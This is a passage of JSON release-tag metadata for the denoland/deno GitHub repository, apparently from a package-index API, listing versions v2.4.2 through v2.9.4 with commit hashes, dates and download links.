eno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland